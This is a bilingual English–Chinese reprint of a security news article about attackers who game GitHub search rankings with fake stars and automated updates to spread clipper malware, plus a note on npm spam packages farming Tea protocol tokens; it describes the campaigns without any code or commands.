谨防：GitHub的虚假流行骗局诱使开发人员下载恶意软件

Threat actors are now taking advantage of GitHub's search functionality to trick unsuspecting users looking for popular repositories into downloading spurious counterparts that serve malware.

威胁行为者现在利用GitHub的搜索功能欺骗那些寻找热门存储库的用户，使他们下载恶意软件。

The latest assault on the open-source software supply chain involves concealing malicious code within Microsoft Visual Code project files that's designed to download next-stage payloads from a remote URL, Checkmarx said in a report shared with The Hacker News.

对开源软件供应链的最新攻击涉及在Microsoft Visual Code项目文件中隐藏恶意代码，旨在从远程URL下载下一个阶段的载荷，在一份与The Hacker News分享的报告中Checkmarx表示。

"Attackers create malicious repositories with popular names and topics, using techniques like automated updates and fake stars to boost search rankings and deceive users," security researcher Yehuda Gelb said.

"攻击者创建带有热门名称和主题的恶意存储库，使用自动更新和虚假赞来提高搜索排名，并欺骗用户，"安全研究人员Yehuda Gelb说。

The idea is to manipulate the search rankings in GitHub to bring threat actor-controlled repositories to the top when users filter and sort their results based on the most recent updates and increase the popularity via bogus stars added via fake accounts.

其目的是通过操纵GitHub的搜索排名，让受威胁的行为者控制的存储库在用户根据最新更新对结果进行过滤和排序时排在前列，并通过虚假账户添加的伪星星增加其受欢迎程度。

In doing so, the attack lends a veneer of legitimacy and trust to the fraudulent repositories, effectively deceiving developers into downloading them.

这样一来，攻击会为欺骗开发人员下载它们赋予欺骗性和信任的外观。

"In contrast to past incidents where attackers were found to add hundreds or thousands of stars to their repos, it appears that in these cases, the attackers opted for a more modest number of stars, probably to avoid raising suspicion with an exaggerated number," Gelb said.

"与以往攻击者发现向其存储库添加了数百或数千颗星星的事件相比，似乎在这些情况下，攻击者选择了更为适度数量的星星，可能是为了避免因夸大数量而引起怀疑，"Gelb说。

It's worth pointing out that previous research from Checkmarx late last year uncovered a black market comprising online stores and chat groups that are selling GitHub stars to artificially boost a repository's popularity, a technique referred to as star inflation.

此外，Checkmarx去年晚些时候的一项研究发现了一个黑市，其中包括在线商店和聊天群，它们出售GitHub星星以人为提升存储库的受欢迎度，这种技术称为星星膨胀。

What's more, a majority of these repositories are disguised as legitimate projects related to popular games, cheats, and tools, adding another layer of sophistication to make it harder to distinguish them from benign code.

此外，这些存储库中的大多数都伪装成与热门游戏、作弊和工具相关的合法项目，增加了另一层复杂性，使其更难以与良性代码区分开来。

Some repositories have been observed downloading an encrypted .7z file containing an executable named "feedbackAPI.exe" that has been inflated to 750 MB in a likely attempt to evade antivirus scanning and ultimately launch malware that shares similarities with Keyzetsu clipper.

已观察到一些存储库下载了一个加密的.7z文件，其中包含一个名为"feedbackAPI.exe"的可执行文件，其大小被膨胀到750 MB，很可能是为了规避杀毒软件扫描，并最终启动与Keyzetsu clipper相似的恶意软件。

The Windows malware, which came to light early last year, is often distributed through pirated software such as Evernote. It's capable of diverting cryptocurrency transactions to attacker-owned wallets by substituting the wallet address copied in the clipboard.

这种Windows恶意软件，即去年初曝光的，经常通过盗版软件（如Evernote）进行分发。它能够通过替换剪贴板中复制的钱包地址将加密货币交易转移到攻击者拥有的钱包。

The findings underscore the due diligence that developers must follow when downloading source code from open-source repositories, not to mention the dangers of solely relying on reputation as a metric to evaluate trustworthiness.

这些发现强调了开发人员在从开源存储库下载源代码时必须遵循的尽职调查，更不用说仅依靠声誉作为评估可信度的指标的危险性了。

"The use of malicious GitHub repositories to distribute malware is an ongoing trend that poses a significant threat to the open-source ecosystem," Gelb said.

"利用恶意GitHub存储库分发恶意软件是一种持续的趋势，对开源生态系统构成了重大威胁，"Gelb说。

"By exploiting GitHub's search functionality and manipulating repository properties, attackers can lure unsuspecting users into downloading and executing malicious code."

"通过利用GitHub的搜索功能和操纵存储库属性，攻击者可以诱使不知情的用户下载并执行恶意代码。"

The development comes as Phylum said it discovered an uptick in the number of spam (i.e., non-malicious) packages being published to the npm registry by a user named ylmin to orchestrate a "massive automated crypto farming campaign" that abuses the Tea protocol.

Phylum表示，他们发现通过名为ylmin的用户向npm注册表发布了大量的垃圾邮件（即非恶意）包，以策划一场"大规模自动加密货币挖矿活动"，滥用了Tea协议。

"The Tea protocol is a web3 platform whose stated goal is compensating open source package maintainers, but instead of cash rewards, they are rewarded with TEA tokens, a cryptocurrency," the company's research team said.

"Tea协议是一个Web3平台，其宣称的目标是补偿开源软件包维护者，但与现金奖励不同，他们会获得TEA令牌，一种加密货币，"公司的研究团队表示。

"The Tea protocol is not even live yet. These users are farming points from the 'Incentivized Testnet,' apparently with the expectation that having more points in the Testnet will increase their odds of receiving a later airdrop."

"Tea协议甚至还没有启动。这些用户正在从'激励测试网'中获取点数，显然期望在后续的空投中拥有更多的点数。"

参考资料

[1]https://thehackernews.com/2024/04/beware-githubs-fake-popularity-scam.html

关注我们

        欢迎来到我们的公众号！我们专注于全球网络安全和精选双语资讯，为您带来最新的资讯和深入的分析。在这里，您可以了解世界各地的网络安全事件，同时通过我们的双语新闻，获取更多的行业知识。感谢您选择关注我们，我们将继续努力，为您带来有价值的内容。